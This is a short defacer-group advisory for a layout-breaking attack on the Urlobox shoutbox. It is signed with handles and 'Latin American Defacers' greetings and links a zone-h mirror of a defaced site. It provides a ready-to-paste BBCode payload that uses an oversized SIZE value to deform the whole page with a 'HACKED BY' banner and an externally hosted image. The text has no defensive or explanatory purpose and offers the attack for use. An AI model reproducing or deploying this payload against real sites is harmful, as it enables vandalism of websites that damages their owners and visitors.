############ ##By: HanowarS ##email: vannovax[at]gmail.com ##web: www.c-group.org ##Greetz: _Antrax_, NettoXic, ssh-2, Ednux, eno7 ## Latin American Defacers ################################## Urlobox, you must create a Message with value of Zize Greater to 15 (2000 as Example) this causes that the Tables, where include of UrloBox lodges and the recent messages, create a Disfigurement to the Complete Site. Results: http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=45&id=4856198 CodeBB: [COLOR=red][SIZE=2000][FONT=Optima][I][B]HACKED BY NICK HACKER!!![/B][/I][/FONT][/SIZE][/COLOR] [IMG]http://ronja.eclub.lv/hackedBy_me.jpg[/IMG] Bytes